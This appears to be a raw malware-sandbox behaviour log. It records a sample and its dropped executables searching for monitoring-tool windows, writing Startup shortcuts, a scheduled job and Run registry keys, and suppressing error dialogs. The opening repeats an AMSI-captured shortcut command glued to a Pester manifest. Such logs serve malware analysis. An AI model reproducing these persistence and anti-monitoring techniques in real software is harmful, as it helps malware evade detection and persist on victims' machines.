Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = ''# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = ''# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = ''# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = ''# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: .lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = ''# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = ''# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk

Source: C:\Users\user\DocumentsKECBGCGCGI.exe

File created: C:\Windows\Tasks\skotes.job

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yiuq.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zzvy.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dslm.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tytb.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\akdz.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kncs.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\syie.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xsap.lnk

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 06d4af6f50.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 06d4af6f50.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run deb333ea90.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run deb333ea90.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ea44ea94c2.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ea44ea94c2.exe

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\DocumentsKECBGCGCGI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
